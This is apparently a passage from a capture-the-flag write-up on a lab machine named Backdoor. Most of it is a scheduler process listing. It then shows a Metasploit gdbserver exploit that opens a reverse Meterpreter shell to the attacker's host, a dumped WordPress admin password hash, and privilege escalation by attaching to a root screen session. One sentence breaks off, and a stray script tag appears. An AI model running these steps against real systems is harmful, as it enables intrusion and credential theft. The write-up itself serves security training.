 I blkcg_punt_bio    80        31.009996         2   100         0.000000         0.000000         0.000000 0 0 /
 I     tpm_dev_wq    82        60.253196         2   100         0.000000         0.018134         0.000000 0 0 /
 I             md    84        66.265997         2   100         0.000000         0.012804         0.000000 0 0 /
 I     devfreq_wq    86        72.265994         2   100         0.000000         0.000000         0.000000 0 0 /
 S  irq/25-pciehp    95         0.000000         3    49         0.000000         0.098364         0.000000 0 0 /
 S  irq/27-pciehp    97         0.000000         3    49         0.000000         0.074259         0.000000 0 0 /
 S  irq/29-pciehp    99         0.000000         3    49         0.000000         0.060232         0.000000 0 0 /
 S  irq/31-pciehp   101         0.000000         3    49         0.000000         0.064952         0.000000 0 0 /
 S  irq/33-pciehp   103         0.000000         3    49         0.000000         0.060844         0.000000 0 0 /
 S  irq/35-pciehp   105         0.000000         3    49         0.000000         0.052880         0.000000 0 0 /
 S  irq/37-pciehp   107         0.000000         3    49         0.000000         0.057037         0.000000 0 0 /
 S  irq/39-pciehp   109         0.000000         3    49         0.000000         0.058782         0.000000 0 0 /
 S  irq/41-pciehp   111         0.000000         3    49         0.000000         0.100228         0.000000 0 0 /
 S  irq/43-pciehp   113         0.000000         3    49         0.000000         0.059951         0.000000 0 0 /
 S  irq/45-pciehp   115         0.000000         3    49         0.000000         0.089128         0.000000 0 0 /
 S  irq/47-pciehp   117         0.000000         3    49         0.000000         0.061237         0.000000 0 0 /
 S  irq/49-pciehp   119         0.000000         3    49         0.000000         0.081914         0.000000 0 0 /
 S  irq/51-pciehp   121         0.000000         3    49         0.000000         0.148941         0.000000 0 0 /
 S  irq/53-pciehp   123         0.000000         3    49         0.000000         0.069501         0.000000 0 0 /
 S  irq/55-pciehp   125         0.000000         3    49         0.000000         0.124664         0.000000 0 0 /
 I  ipv6_addrconf   134       394.670272         2   100         0.000000         0.051215         0.000000 0 0 /
 I          kstrp   143       448.948194         3   100         0.000000         0.010611         0.000000 0 0 /
 Icharger_manager   159       531.359867         2   100         0.000000         0.027722         0.000000 0 0 /
 I     mpt_poll_0   199      1206.995955         2   100         0.000000         0.013214         0.000000 0 0 /
 I          mpt/0   200      1211.832800         2   100         0.000000         0.018335         0.000000 0 0 /
 S      scsi_eh_3   203      1639.057129        25   120         0.000000         1.141942         0.000000 0 0 /
 S      scsi_eh_4   205      1639.107283        25   120         0.000000         2.195027         0.000000 0 0 /
 S      scsi_eh_5   207      1640.252890        25   120         0.000000         4.389300         0.000000 0 0 /
 S      scsi_eh_6   209      1639.106100        25   120         0.000000         1.400665         0.000000 0 0 /
 S      scsi_eh_7   211      1640.683252        26   120         0.000000         1.534427         0.000000 0 0 /
 S      scsi_eh_8   213      1640.417824        26   120         0.000000         1.260605         0.000000 0 0 /
 S      scsi_eh_9   215      1641.143865        26   120         0.000000         2.055674         0.000000 0 0 /
 S     scsi_eh_11   220      1640.611607        26   120         0.000000         1.511273         0.000000 0 0 /
 I         cryptd   227      1287.913408         2   100         0.000000         0.008867         0.000000 0 0 /
 S     scsi_eh_12   228      1640.296957        26   120         0.000000         1.134850         0.000000 0 0 /
 I    scsi_tmf_13   236      1299.288637         2   100         0.000000         0.057277         0.000000 0 0 /
 I    scsi_tmf_14   243      1314.656765         2   100         0.000000         0.015299         0.000000 0 0 /
 S     scsi_eh_15   244      1640.364244        26   120         0.000000         1.199839         0.000000 0 0 /
 S     scsi_eh_19   252      1640.768592        26   120         0.000000         1.617826         0.000000 0 0 /
 I    scsi_tmf_19   253      1355.316947         2   100         0.000000         0.019527         0.000000 0 0 /
 S     scsi_eh_20   255      1640.850175        26   120         0.000000         1.698173         0.000000 0 0 /
 I    scsi_tmf_21   272      1416.270168         2   100         0.000000         0.007414         0.000000 0 0 /
 I    scsi_tmf_22   275      1422.995603         2   100         0.000000         0.004068         0.000000 0 0 /
 I    scsi_tmf_23   277      1430.998631         2   100         0.000000         0.003978         0.000000 0 0 /
 I    scsi_tmf_24   279      1439.000530         2   100         0.000000         0.002886         0.000000 0 0 /
 S     scsi_eh_25   280      1642.032120        26   120         0.000000         2.849027         0.000000 0 0 /
 I    scsi_tmf_25   281      1447.004124         2   100         0.000000         0.004629         0.000000 0 0 /
 I    scsi_tmf_26   283      1455.005794         2   100         0.000000         0.002616         0.000000 0 0 /
 S     scsi_eh_27   284      1640.323468        26   120         0.000000         1.207104         0.000000 0 0 /
 I    scsi_tmf_27   285      1463.007878         2   100         0.000000         0.003246         0.000000 0 0 /
 S     scsi_eh_28   286      1640.912091        26   120         0.000000         1.727789         0.000000 0 0 /
 I    scsi_tmf_28   287      1471.009396         2   100         0.000000         0.002555         0.000000 0 0 /
 I    scsi_tmf_29   289      1479.011116         2   100         0.000000         0.002704         0.000000 0 0 /
 I    scsi_tmf_30   291      1487.012670         2   100         0.000000         0.002606         0.000000 0 0 /
 S     scsi_eh_31   292      1641.747838        26   120         0.000000         2.754366         0.000000 0 0 /
 I    scsi_tmf_31   293      1495.016347         2   100         0.000000         0.015408         0.000000 0 0 /
 I       ttm_swap   299      1501.363607         2   100         0.000000         0.006302         0.000000 0 0 /
 S     scsi_eh_32   325      1649.795210         2   120         0.000000         0.010450         0.000000 0 0 /
 I    scsi_tmf_32   326      1653.795371         2   100         0.000000         0.008967         0.000000 0 0 /
 I   kworker/1:1H   327   2449246.535081      2543   100         0.000000       378.638243         0.000000 0 0 /
 I       kdmflush   341      1788.165961         2   100         0.000000         0.017433         0.000000 0 0 /
 I        raid5wq   372      2544.837844         2   100         0.000000         0.024706         0.000000 0 0 /
 S    jbd2/dm-0-8   427   2449246.731951      8205   120         0.000000       415.297379         0.000000 0 0 /
 Ssystemd-journal   485       828.686418      6971   119         0.000000      2085.317518         0.000000 0 0 /autogroup-3
 I         kaluad   651      5457.511061         2   100         0.000000         0.034686         0.000000 0 0 /
 I        kmpathd   653      5466.659430         2   100         0.000000         0.031038         0.000000 0 0 /
 Ikmpath_handlerd   654      5470.676944         2   100         0.000000         0.018764         0.000000 0 0 /
 S     multipathd   655         0.000000      9354     0         0.000000       271.015553         0.000000 0 0 /autogroup-24
 S     multipathd   657         0.000000         1     0         0.000000         0.573295         0.000000 0 0 /autogroup-24
 S     multipathd   658         0.000000       264     0         0.000000        12.498980         0.000000 0 0 /autogroup-24
 Ssystemd-resolve   682       600.389891      1969   120         0.000000      1329.974971         0.000000 0 0 /autogroup-30
 Ssystemd-timesyn   684       280.499537       905   120         0.000000       283.004018         0.000000 0 0 /autogroup-32
 S     sd-resolve   749       284.073195      3032   120         0.000000       462.974149         0.000000 0 0 /autogroup-32
 S          gmain   754       299.795643       150   120         0.000000         1.936169         0.000000 0 0 /autogroup-36
 S          gmain   795         4.930670         1   120         0.000000         0.060864         0.000000 0 0 /autogroup-41
 Snetworkd-dispat   791       114.971450       297   120         0.000000       116.472775         0.000000 0 0 /autogroup-43
 S    in:imuxsock   866       127.836480      3290   120         0.000000       184.764803         0.000000 0 0 /autogroup-44
 S           cron   820        59.704734       155   120         0.000000        30.268069         0.000000 0 0 /autogroup-52
 S             sh   842        60.272564        16   120         0.000000         3.601773         0.000000 0 0 /autogroup-59
 S             sh   843     55433.904419     15748   120         0.000000      3714.895300         0.000000 0 0 /autogroup-58
 S            atd   851         0.673944         7   120         0.000000         2.634171         0.000000 0 0 /autogroup-62
 S        apache2   926    386846.401690      8061   120         0.000000       562.526201         0.000000 0 0 /autogroup-72
 S        polkitd   942        15.637099       148   120         0.000000        18.602996         0.000000 0 0 /autogroup-75
 S        systemd   943        16.509190       151   120         0.000000       286.442990         0.000000 0 0 /autogroup-76
 S         screen   953         0.786517        11   120         0.000000         1.880084         0.000000 0 0 /autogroup-77
 S     ib_io_wr-2  1011    103394.923061     15716   120         0.000000       311.439982         0.000000 0 0 /autogroup-79
 S     ib_io_wr-3  1012    103394.944602     15741   120         0.000000       312.632976         0.000000 0 0 /autogroup-79
 S   ib_log_flush  1017    103400.120898     75454   120         0.000000      2666.836883         0.000000 0 0 /autogroup-79
 Sib_log_wr_notif  1018    103400.124849     74636   120         0.000000      2442.060537         0.000000 0 0 /autogroup-79
 S  ib_log_writer  1019    103400.106280     75088   120         0.000000      2726.888700         0.000000 0 0 /autogroup-79
 S   xpl_worker-2  1031    103389.836990       131   120         0.000000         4.668030         0.000000 0 0 /autogroup-79
 S   xpl_worker-1  1032    103389.820248       131   120         0.000000         3.124279         0.000000 0 0 /autogroup-79
 S   xpl_accept-1  1033    103394.899968      7850   120         0.000000       350.483107         0.000000 0 0 /autogroup-79
 S  ib_clone_gtid  1038    103400.933641     72970   120         0.000000      3012.630630         0.000000 0 0 /autogroup-79
 S   ib_srv_purge  1039    103085.971353      5852   120         0.000000       148.000895         0.000000 0 0 /autogroup-79
 S   ib_srv_wkr-1  1040    103085.029477      1931   120         0.000000        26.987593         0.000000 0 0 /autogroup-79
 S   ib_srv_wkr-2  1041    103085.029147      1870   120         0.000000        26.957278         0.000000 0 0 /autogroup-79
 S   ib_srv_wkr-3  1042    103085.027644      1886   120         0.000000        25.513948         0.000000 0 0 /autogroup-79
 S       gtid_zip  1047       858.294767         1   120         0.000000         0.335218         0.000000 0 0 /autogroup-79
 S     connection 12508    103039.014369    110145   120         0.000000     20748.367524         0.000000 0 0 /autogroup-79
 S     connection 12521    103123.701777    109018   120         0.000000     20689.178013         0.000000 0 0 /autogroup-79
 S     connection 12526    103001.072447    108666   120         0.000000     20900.254752         0.000000 0 0 /autogroup-79
 S     connection 12544    103037.628643    110191   120         0.000000     20792.660902         0.000000 0 0 /autogroup-79
 S        apache2 10146    386846.357414    168952   120         0.000000    133865.154232         0.000000 0 0 /autogroup-72
 S        apache2 13130    386845.243667    143250   120         0.000000    105463.200468         0.000000 0 0 /autogroup-72
 I    kworker/1:2 13218   2444677.878356     13963   120         0.000000       700.236041         0.000000 0 0 /
 S             su 16352        77.264166        22   120         0.000000         5.146738         0.000000 0 0 /autogroup-59
 S           bash 16355         0.618440         3   120         0.000000         2.501491         0.000000 0 0 /autogroup-122
 S        apache2 16773    386844.198224      6861   120         0.000000      4382.432216         0.000000 0 0 /autogroup-72
 I    kworker/1:1 17524   2449250.990254     14720   120         0.000000       921.840297         0.000000 0 0 /
>R        apache2 17808    386844.756858      1476   120         0.000000       387.596337         0.000000 0 0 /autogroup-72
 I kworker/u256:0 19561   2447385.506565       565   120         0.000000        20.815690         0.000000 0 0 /
 S        apache2 20947    386843.504862      1207   120         0.000000       300.403764         0.000000 0 0 /autogroup-72

<script>window.close()</script>

We notice that gdbserver is running. If we look at proc/16356/cmdline we get

We can get a shell by using metasploit

msf6 exploit(multi/gdb/gdb_server_exec) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
[*] 10.10.11.125:1337 - Stepping program to find PC...
[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.10.11.125:1337 - Executing the payload...
[*] Sending stage (3012548 bytes) to 10.10.11.125
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.11.125:54812 ) at 2021-11-22 11:20:04 +0100

meterpreter > shell
Process 1342 created.
Channel 1 created.

python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:~$ ls
ls
user.txt
user@Backdoor:~$ whoami
whoami
user
user@Backdoor:~$ cat user.txt
cat user.txt
eb5a36cfbdb157c87efe552fc3eb982c

We can also obtain the admin hash from the wp db

select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+---------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url            | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+---------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$Bt8c3ivanSGd2TFcm3HV/9ezXPueg5. | admin         | admin@wordpress.com | http://backdoor.htb | 2021-07-24 13:19:11 |                     |           0 | admin  

Running linpeas we see that screen is running as root

root         821  0.0  0.0   2608  1756 ?        Ss   10:21   0:00      _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root ;; done                                                                
root        7172  0.0  0.0   5476   588 ?        S    10:44   0:00          _ sleep 1                                                      

When we just run screen we see

-dmS name     Start as daemon: Screen session in detached mode.

So root has created a session called root

We can attach to this session running screen -r root/root